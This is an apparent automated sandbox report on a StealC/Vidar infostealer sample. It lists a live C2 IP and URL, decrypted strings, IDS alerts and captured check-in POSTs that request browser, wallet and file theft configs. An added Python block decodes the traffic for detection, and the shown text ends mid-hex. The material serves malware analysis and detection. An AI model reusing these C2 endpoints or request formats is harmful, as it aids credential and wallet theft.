Source: http://23.88.106.134/c73eed764cc59dcb.php.0//EN | Avira URL Cloud: Label: malware |
Source: http://23.88.106.134/84bad7132df89fd7/sqlite3.dll | Avira URL Cloud: Label: malware |
Source: http://23.88.106.134 | Avira URL Cloud: Label: malware |
Source: http://23.88.106.134/c73eed764cc59dcb.php | Avira URL Cloud: Label: malware |
Source: http://23.88.106.134/c73eed764cc59dcb.phpxKr | Avira URL Cloud: Label: malware |
Source: http://23.88.106.134/c73eed764cc59dcb.phpininit.exe | Avira URL Cloud: Label: malware |
Source: 00000001.00000002.2034961312.000000000106A000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: StealC {"C2 url": "http://23.88.106.134/c73eed764cc59dcb.php"} |
Source: 1.2.RegAsm.exe.400000.0.unpack | Malware Configuration Extractor: Vidar {"C2 url": "http://23.88.106.134/c73eed764cc59dcb.php"} |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: CtIvEWInDoW |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: AgEBOxw |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: ijklmnopqrs |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: /#%33@@@ |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: abcdefghijklmnopqrs |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: @@@@<@@@ |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: abcdefghijklmnopqrs |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: "&&""..""&&"">>""&&"".."ikSQWQSQ_QBEklmn^pqrBtuvFxyzL123H5679+/| |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: %s\%V/yVs |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: %s\*. |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: }567y9n/S |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: ntTekeny |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: ging |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: PassMord0 |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: J@@@`z`@J@@@J@@@ |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: OPQRSTUVWXY |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: 456753+/---- ' |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: '--- ' |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: HeapFree |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: GetLocaleInfoA |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: ntProcessId |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: HHxf0UR{bYAy |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: wininet.dll |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: shlwapi.dll |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: shell32.dll |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: .dll |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: column_text |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: 5336 |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: login: |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: islr7$B |
Source: w7kdnBzGat.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE |
Source: | Binary string: C:\p2facz8e\output.pdb& source: w7kdnBzGat.exe |
Source: | Binary string: C:\p2facz8e\output.pdb source: w7kdnBzGat.exe |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_0050E877 FindFirstFileExW, | 0_2_0050E877 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_0050EC61 FindFirstFileExW,FindNextFileW,FindClose,FindClose, | 0_2_0050EC61 |
Source: Traffic | Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.5:49704 -> 23.88.106.134:80 |
Source: Traffic | Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.5:49704 -> 23.88.106.134:80 |
Source: Traffic | Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.5:49704 -> 23.88.106.134:80 |
Source: Malware configuration extractor | URLs: http://23.88.106.134/c73eed764cc59dcb.php |
Source: global traffic | HTTP traffic detected: POST /c73eed764cc59dcb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGCFHIDAKECFHIEBFCGHost: 23.88.106.134Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 42 45 35 43 37 30 39 44 33 31 32 32 30 34 30 34 30 39 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 67 6f 79 64 61 31 34 38 38 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 2d 2d 0d 0a Data Ascii: ------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="hwid"5BE5C709D3122040409402------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="build"goyda1488------HDGCFHIDAKECFHIEBFCG-- |
Source: global traffic | HTTP traffic detected: POST /c73eed764cc59dcb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFBGDGIDBAAEBFHJKJDGHost: 23.88.106.134Content-Length: 472Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 42 47 44 47 49 44 42 41 41 45 42 46 48 4a 4b 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 47 44 47 49 44 42 41 41 45 42 46 48 4a 4b 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 47 44 47 49 44 42 41 41 45 42 46 48 4a 4b 4a 44 47 2d 2d 0d 0a Data Ascii: ------BFBGDGIDBAAEBFHJKJDGContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html>------BFBGDGIDBAAEBFHJKJDGContent-Disposition: form-data; name="message"browsers------BFBGDGIDBAAEBFHJKJDG-- |
Source: global traffic | HTTP traffic detected: POST /c73eed764cc59dcb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAECGCGHCGHCAKECBKJKHost: 23.88.106.134Content-Length: 471Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 43 47 43 47 48 43 47 48 43 41 4b 45 43 42 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 47 43 47 48 43 47 48 43 41 4b 45 43 42 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 47 43 47 48 43 47 48 43 41 4b 45 43 42 4b 4a 4b 2d 2d 0d 0a Data Ascii: ------DAECGCGHCGHCAKECBKJKContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html>------DAECGCGHCGHCAKECBKJKContent-Disposition: form-data; name="message"plugins------DAECGCGHCGHCAKECBKJK-- |
Source: global traffic | HTTP traffic detected: POST /c73eed764cc59dcb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDGHost: 23.88.106.134Content-Length: 7275Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /84bad7132df89fd7/sqlite3.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache |
Source: global traffic | HTTP traffic detected: POST /c73eed764cc59dcb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGIECGIEBKJJJJKEGHJHost: 23.88.106.134Content-Length: 471Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 2d 2d 0d 0a Data Ascii: ------JDGIECGIEBKJJJJKEGHJContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html>------JDGIECGIEBKJJJJKEGHJContent-Disposition: form-data; name="message"wallets------JDGIECGIEBKJJJJKEGHJ-- |
Source: global traffic | HTTP traffic detected: POST /c73eed764cc59dcb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHIEBKKFHIEGCAKECGHHost: 23.88.106.134Content-Length: 469Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 2d 2d 0d 0a Data Ascii: ------AFHIEBKKFHIEGCAKECGHContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html>------AFHIEBKKFHIEGCAKECGHContent-Disposition: form-data; name="message"files------AFHIEBKKFHIEGCAKECGH-- |
Source: global traffic | HTTP traffic detected: POST /c73eed764cc59dcb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJKFBAKFBGDHIEBGDAKFHost: 23.88.106.134Content-Length: 464Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 41 4b 46 42 47 44 48 49 45 42 47 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 41 4b 46 42 47 44 48 49 45 42 47 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 41 4b 46 42 47 44 48 49 45 42 47 44 41 4b 46 2d 2d 0d 0a Data Ascii: ------JJKFBAKFBGDHIEBGDAKFContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html>------JJKFBAKFBGDHIEBGDAKFContent-Disposition: form-data; name="message"------JJKFBAKFBGDHIEBGDAKF-- |
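The six POSTs above are one complete StealC check-in as captured: first hwid/build, then one token+message request per data class (browsers, plugins, wallets, files, and a final empty message). Because the C2 path answered 404, the sample sent the server's 276-byte error page back as its "token" in every follow-up request, which is a useful signal on its own. The Python below is an added example, not part of the sandbox report or of the sample: it decodes the first request directly from the report's Data Raw hex column, rebuilds the follow-up bodies from the transcribed 404 page using the boundaries shown above, parses them with a minimal multipart/form-data reader and classifies the sequence. It assumes nothing beyond what the captured bodies show; the field semantics (hwid, build, token, message) are taken at face value, and the Content-Length values in the report are used only as a cross-check on the transcription.

```python
"""Decode and classify the StealC C2 POSTs captured in the report above (added example)."""
import re
from typing import Dict, List, Tuple

# --- Sample input, constructed from the report ---------------------------------
# Initial check-in body, copied verbatim from the "Data Raw" hex column of the first
# POST /c73eed764cc59dcb.php (its header says Content-Length: 216).
CHECKIN_CONTENT_TYPE = "multipart/form-data; boundary=----HDGCFHIDAKECFHIEBFCG"
CHECKIN_RAW_HEX = (
    "2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 "
    "6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a "
    "35 42 45 35 43 37 30 39 44 33 31 32 32 30 34 30 34 30 39 34 30 32 0d 0a "
    "2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 "
    "6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a "
    "67 6f 79 64 61 31 34 38 38 0d 0a "
    "2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 2d 2d 0d 0a"
)

# The 404 page the server returned (Content-Length: 276 in the responses above),
# transcribed with its original LF line endings. The sample echoes it as "token".
ERROR_PAGE = (
    b'<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n'
    b"<html><head>\n"
    b"<title>404 Not Found</title>\n"
    b"</head><body>\n"
    b"<h1>Not Found</h1>\n"
    b"<p>The requested URL was not found on this server.</p>\n"
    b"<hr>\n"
    b"<address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address>\n"
    b"</body></html>\n"
)


def config_request(boundary: str, message: bytes) -> Tuple[str, bytes]:
    """Rebuild one follow-up POST (token + message) with the exact layout the capture shows."""
    delim = b"--" + boundary.encode("ascii")
    body = (
        delim + b'\r\nContent-Disposition: form-data; name="token"\r\n\r\n' + ERROR_PAGE + b"\r\n"
        + delim + b'\r\nContent-Disposition: form-data; name="message"\r\n\r\n' + message + b"\r\n"
        + delim + b"--\r\n"
    )
    return f"multipart/form-data; boundary={boundary}", body


# --- Parsing and classification ------------------------------------------------
def parse_multipart(content_type: str, body: bytes) -> Dict[str, bytes]:
    """Minimal multipart/form-data reader: returns {field name: raw value bytes}."""
    m = re.search(r"boundary=([^;\s]+)", content_type)
    if m is None:
        raise ValueError("Content-Type carries no boundary")
    delimiter = b"--" + m.group(1).encode("ascii")   # "--" + boundary, per RFC 2046
    fields: Dict[str, bytes] = {}
    for part in body.split(delimiter):
        if b"\r\n\r\n" not in part:        # preamble, closing "--\r\n", or junk
            continue
        headers, value = part.split(b"\r\n\r\n", 1)
        name = re.search(rb'name="([^"]*)"', headers)
        if name is None:
            continue
        if value.endswith(b"\r\n"):         # CRLF that precedes the next delimiter
            value = value[:-2]
        fields[name.group(1).decode("ascii", "replace")] = value
    return fields


CONFIG_REQUESTS = ("browsers", "plugins", "wallets", "files")


def classify(fields: Dict[str, bytes]) -> str:
    """Map one parsed body to its place in the StealC check-in sequence."""
    if "hwid" in fields and "build" in fields:
        return "checkin"
    if "token" in fields and "message" in fields:
        msg = fields["message"].decode("ascii", "replace")
        return "config:" + (msg if msg else "<empty>")
    return "unknown"


def token_is_error_page(fields: Dict[str, bytes]) -> bool:
    """True when the 'token' is an HTML document rather than an opaque C2 token."""
    token = fields.get("token", b"").lstrip()
    return token[:9].upper() == b"<!DOCTYPE" or token[:5].lower() == b"<html"


def walk_session(requests: List[Tuple[str, bytes]]) -> List[str]:
    """Classify a whole sequence and flag follow-ups whose token is an error page."""
    labels = []
    for content_type, body in requests:
        fields = parse_multipart(content_type, body)
        label = classify(fields)
        if label.startswith("config:") and token_is_error_page(fields):
            label += " (token=HTML error page)"
        labels.append(label)
    return labels


# The captured session: boundaries and message values are those in the report.
SESSION: List[Tuple[str, bytes]] = [
    (CHECKIN_CONTENT_TYPE, bytes.fromhex(CHECKIN_RAW_HEX)),
    config_request("----BFBGDGIDBAAEBFHJKJDG", b"browsers"),
    config_request("----DAECGCGHCGHCAKECBKJK", b"plugins"),
    config_request("----JDGIECGIEBKJJJJKEGHJ", b"wallets"),
    config_request("----AFHIEBKKFHIEGCAKECGH", b"files"),
    config_request("----JJKFBAKFBGDHIEBGDAKF", b""),
]

if __name__ == "__main__":
    for (_, body), label in zip(SESSION, walk_session(SESSION)):
        print(f"{len(body):5d} bytes  {label}")
```

The rebuilt bodies come out at 216, 472, 471, 471, 469 and 464 bytes, the same Content-Length values the report shows for the six requests, which confirms the transcription and the CRLF placement. For detection, the combination of `name="hwid"` followed by `name="build"` in a multipart POST to a bare-IP host, and a later `name="token"` whose value starts with `<!DOCTYPE`, separates this traffic from ordinary form uploads without depending on the boundary strings, which change per request.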
Source: unknown | TCP traffic detected without corresponding DNS query: 23.88.106.134 (20 identical events) |
Source: unknown | HTTP traffic detected: POST /c73eed764cc59dcb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGCFHIDAKECFHIEBFCGHost: 23.88.106.134Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 42 45 35 43 37 30 39 44 33 31 32 32 30 34 30 34 30 39 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 67 6f 79 64 61 31 34 38 38 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 2d 2d 0d 0a Data Ascii: ------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="hwid"5BE5C709D3122040409402------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="build"goyda1488------HDGCFHIDAKECFHIEBFCG-- |
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 May 2024 12:53:00 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 276Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 